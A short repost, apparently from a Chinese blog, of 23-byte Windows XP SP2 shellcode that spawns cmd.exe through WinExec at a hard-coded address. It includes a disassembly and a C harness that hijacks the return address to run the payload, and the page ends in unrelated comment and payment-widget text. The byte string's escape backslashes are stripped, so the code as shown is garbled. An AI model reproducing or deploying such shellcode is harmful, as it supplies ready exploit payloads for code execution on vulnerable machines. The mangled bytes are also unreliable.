win32/xp sp2 (En + Ar) cmd.exe 23 bytes

win32/xp sp2 (En + Ar) cmd.exe 23 bytes
/*
win32/xp sp2 (En + Ar) cmd.exe 23 bytes
Author : AnTi SeCuRe
TeaM : SauDi ViRuS TeaM
Email : AnTi-SeCuRe@HoTMaiL.CoM
Site : WwW.VxX9.Cc
Thx To : Stack , SauDi ViRuS TeaM ( RENO - Dr.php - ! BaD BoY ! - Jetli007
- Gov.hacker )
Description : It's a 23 Byte Shellcode which Execute Cmd.exe Tested Under
Windows Xp SP2 English and arabic .
get the following if we disassemle this code compiled with olly debugger

00402000 > 8BEC MOV EBP,ESP
00402002 . 68 65786520 PUSH 20657865
00402007 . 68 636D642E PUSH 2E646D63
0040200C . 8D45 F8 LEA EAX,DWORD PTR SS:[EBP-8]
0040200F . 50 PUSH EAX
00402010 . B8 8D15867C MOV EAX,kernel32.WinExec
00402015 . FFD0 CALL EAX
*/
#include <stdio.h>
unsigned char shellcode[] =
"x8bxecx68x65x78x65"
"x20x68x63x6dx64x2e"
"x8dx45xf8x50xb8x8D"
"x15x86x7Cxffxd0";
int main ()
{
int *ret;
ret=(int *)&ret+2;
printf("Shellcode Length is : %dn",strlen(shellcode));
(*ret)=(int)shellcode;
return 0;
}
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值